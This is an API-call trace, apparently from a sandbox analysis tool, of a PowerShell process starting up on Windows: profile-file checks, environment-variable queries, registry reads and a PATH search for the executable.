	[0306.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0306.209] SetErrorMode (uMode=0x1) returned 0x1
	[0306.209] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d880 | out: lpFileInformation=0x12d880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0306.209] SetErrorMode (uMode=0x1) returned 0x1
	[0306.209] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0306.209] SetErrorMode (uMode=0x1) returned 0x1
	[0306.209] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d880 | out: lpFileInformation=0x12d880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0306.209] SetErrorMode (uMode=0x1) returned 0x1
	[0306.209] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0306.209] SetErrorMode (uMode=0x1) returned 0x1
	[0306.209] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d880 | out: lpFileInformation=0x12d880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0306.209] SetErrorMode (uMode=0x1) returned 0x1
	[0306.210] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0306.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.210] CoTaskMemFree (pv=0x24c710) 
	[0306.210] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0306.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.210] CoTaskMemFree (pv=0x24c710) 
	[0306.211] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0306.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.211] CoTaskMemFree (pv=0x24c710) 
	[0306.212] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0306.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.212] CoTaskMemFree (pv=0x24c710) 
	[0306.212] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0306.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.213] CoTaskMemFree (pv=0x24c710) 
	[0306.213] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e0
	[0306.213] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x398
	[0306.213] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x300
	[0306.213] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0306.213] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x39c
	[0306.213] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x31c
	[0306.213] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0306.213] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c4
	[0306.214] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1cc
	[0306.214] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1c8
	[0306.214] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0306.214] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0306.214] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0306.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.215] CoTaskMemFree (pv=0x24c710) 
	[0306.216] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0306.216] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x12da60 | out: lpMode=0x12da60) returned 1
	[0306.217] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0306.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.217] CoTaskMemFree (pv=0x24c710) 
	[0306.220] SetEvent (hEvent=0x304) returned 1
	[0306.220] SetEvent (hEvent=0x2e0) returned 1
	[0306.220] SetEvent (hEvent=0x398) returned 1
	[0306.221] SetEvent (hEvent=0x300) returned 1
	[0306.221] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0306.222] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0306.222] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.223] CoTaskMemFree (pv=0x24c710) 
	[0306.223] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d7b8 | out: phkResult=0x12d7b8*=0x3a0) returned 0x0
	[0306.223] RegQueryValueExW (in: hKey=0x3a0, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x12d73c, lpData=0x0, lpcbData=0x12d738*=0x0 | out: lpType=0x12d73c*=0x0, lpData=0x0, lpcbData=0x12d738*=0x0) returned 0x2

Thread:
	id = 41
	os_tid = 0x744


Thread:
	id = 45
	os_tid = 0x724


Thread:
	id = 53
	os_tid = 0x328


Thread:
	id = 60
	os_tid = 0x9c0


Thread:
	id = 66
	os_tid = 0x8f8

	[0241.207] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0271.600] RegCloseKey (hKey=0x32c) returned 0x0
	[0271.601] LocalFree (hMem=0x1c7290) returned 0x0
	[0271.601] CloseHandle (hObject=0x31c) returned 1
	[0271.601] CloseHandle (hObject=0x13) returned 1
	[0271.602] CloseHandle (hObject=0xf) returned 1
	[0271.602] RegCloseKey (hKey=0x308) returned 0x0
	[0271.602] RegCloseKey (hKey=0x304) returned 0x0
	[0271.603] RegCloseKey (hKey=0x300) returned 0x0
	[0271.603] LocalFree (hMem=0x1c7260) returned 0x0
	[0282.267] RegCloseKey (hKey=0x300) returned 0x0
	[0292.765] RegCloseKey (hKey=0x38c) returned 0x0
	[0292.765] RegCloseKey (hKey=0x388) returned 0x0
	[0292.766] RegCloseKey (hKey=0x384) returned 0x0
	[0292.766] RegCloseKey (hKey=0x380) returned 0x0
	[0292.767] RegCloseKey (hKey=0x37c) returned 0x0
	[0292.767] RegCloseKey (hKey=0x378) returned 0x0
	[0292.768] RegCloseKey (hKey=0x374) returned 0x0
	[0292.768] RegCloseKey (hKey=0x34c) returned 0x0
	[0292.768] RegCloseKey (hKey=0x3a8) returned 0x0
	[0292.769] RegCloseKey (hKey=0x3a4) returned 0x0
	[0292.769] RegCloseKey (hKey=0x36c) returned 0x0
	[0292.770] RegCloseKey (hKey=0x368) returned 0x0
	[0292.770] RegCloseKey (hKey=0x364) returned 0x0
	[0292.770] RegCloseKey (hKey=0x360) returned 0x0
	[0292.770] RegCloseKey (hKey=0x35c) returned 0x0
	[0292.770] RegCloseKey (hKey=0x358) returned 0x0
	[0292.771] RegCloseKey (hKey=0x354) returned 0x0
	[0292.771] RegCloseKey (hKey=0x350) returned 0x0
	[0292.771] RegCloseKey (hKey=0x3a0) returned 0x0
	[0292.771] RegCloseKey (hKey=0x340) returned 0x0
	[0292.772] RegCloseKey (hKey=0x33c) returned 0x0
	[0292.772] RegCloseKey (hKey=0x338) returned 0x0
	[0292.772] RegCloseKey (hKey=0x1c8) returned 0x0
	[0292.772] RegCloseKey (hKey=0x1cc) returned 0x0
	[0292.773] RegCloseKey (hKey=0x1c4) returned 0x0
	[0292.773] RegCloseKey (hKey=0x32c) returned 0x0
	[0292.773] RegCloseKey (hKey=0x31c) returned 0x0
	[0292.773] RegCloseKey (hKey=0x39c) returned 0x0
	[0292.773] RegCloseKey (hKey=0x304) returned 0x0
	[0292.774] RegCloseKey (hKey=0x300) returned 0x0
	[0292.774] RegCloseKey (hKey=0x398) returned 0x0
	[0292.774] RegCloseKey (hKey=0x394) returned 0x0
	[0292.774] RegCloseKey (hKey=0x370) returned 0x0
	[0292.775] RegCloseKey (hKey=0x3ac) returned 0x0
	[0641.543] RegCloseKey (hKey=0x3a0) returned 0x0

Thread:
	id = 158
	os_tid = 0x4a0


Thread:
	id = 256
	os_tid = 0xd54

	[0307.043] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0307.046] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0307.050] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0307.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.050] CoTaskMemFree (pv=0x24c710) 
	[0307.052] VirtualQuery (in: lpAddress=0x1c7bdb00, lpBuffer=0x1c7be9c0, dwLength=0x30 | out: lpBuffer=0x1c7be9c0*(BaseAddress=0x1c7bd000, AllocationBase=0x1be30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0307.054] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0307.054] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.054] CoTaskMemFree (pv=0x24c710) 
	[0307.056] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0307.056] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.056] CoTaskMemFree (pv=0x24c710) 
	[0307.059] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0307.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.059] CoTaskMemFree (pv=0x24c710) 
	[0307.067] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0307.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.067] CoTaskMemFree (pv=0x24c710) 
	[0307.069] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0307.069] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.069] CoTaskMemFree (pv=0x24c710) 
	[0307.070] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0307.070] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.070] CoTaskMemFree (pv=0x24c710) 
	[0307.074] VirtualQuery (in: lpAddress=0x1c7bddb0, lpBuffer=0x1c7bec70, dwLength=0x30 | out: lpBuffer=0x1c7bec70*(BaseAddress=0x1c7bd000, AllocationBase=0x1be30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0307.075] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0307.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.075] CoTaskMemFree (pv=0x24c710) 
	[0307.077] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0307.077] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.077] CoTaskMemFree (pv=0x24c710) 
	[0307.077] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0307.077] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.077] CoTaskMemFree (pv=0x24c710) 
	[0307.078] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0307.078] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.078] CoTaskMemFree (pv=0x24c710) 
	[0307.082] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0307.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.082] CoTaskMemFree (pv=0x24c710) 
	[0308.624] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0308.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.625] CoTaskMemFree (pv=0x24c710) 
	[0308.627] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0308.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.627] CoTaskMemFree (pv=0x24c710) 
	[0308.628] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0308.628] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.628] CoTaskMemFree (pv=0x24c710) 
	[0308.631] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0308.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.631] CoTaskMemFree (pv=0x24c710) 
	[0308.633] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0308.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.633] CoTaskMemFree (pv=0x24c710) 
	[0308.634] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0308.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.634] CoTaskMemFree (pv=0x24c710) 
	[0308.636] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0308.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.637] CoTaskMemFree (pv=0x24c710) 
	[0308.655] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0308.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.655] CoTaskMemFree (pv=0x24c710) 
	[0311.627] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0311.627] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0311.627] CoTaskMemFree (pv=0x24c710) 
	[0312.781] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0312.781] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0312.781] CoTaskMemFree (pv=0x24c710) 
	[0312.781] CoTaskMemAlloc (cb=0x128) returned 0x1b8d00
	[0312.781] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b8d00, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0312.781] CoTaskMemFree (pv=0x1b8d00) 
	[0315.721] CoTaskMemAlloc (cb=0x20e) returned 0x1b89a5e0
	[0315.721] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b89a5e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0315.721] CoTaskMemFree (pv=0x1b89a5e0) 
	[0316.164] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0316.165] SetErrorMode (uMode=0x1) returned 0x1
	[0316.168] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0323.854] SetErrorMode (uMode=0x1) returned 0x1
	[0324.366] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.366] SetErrorMode (uMode=0x1) returned 0x1
	[0324.367] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.375] SetErrorMode (uMode=0x1) returned 0x1
	[0324.377] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.377] SetErrorMode (uMode=0x1) returned 0x1
	[0324.377] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.385] SetErrorMode (uMode=0x1) returned 0x1
	[0324.387] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.387] SetErrorMode (uMode=0x1) returned 0x1
	[0324.387] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.395] SetErrorMode (uMode=0x1) returned 0x1
	[0324.397] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.397] SetErrorMode (uMode=0x1) returned 0x1
	[0324.397] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.201] SetErrorMode (uMode=0x1) returned 0x1
	[0325.202] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.202] SetErrorMode (uMode=0x1) returned 0x1
	[0325.203] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.211] SetErrorMode (uMode=0x1) returned 0x1
	[0325.213] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.213] SetErrorMode (uMode=0x1) returned 0x1
	[0325.213] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.222] SetErrorMode (uMode=0x1) returned 0x1
	[0325.223] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.224] SetErrorMode (uMode=0x1) returned 0x1
	[0325.224] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.232] SetErrorMode (uMode=0x1) returned 0x1
	[0325.234] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.234] SetErrorMode (uMode=0x1) returned 0x1
	[0325.234] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.243] SetErrorMode (uMode=0x1) returned 0x1
	[0325.244] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
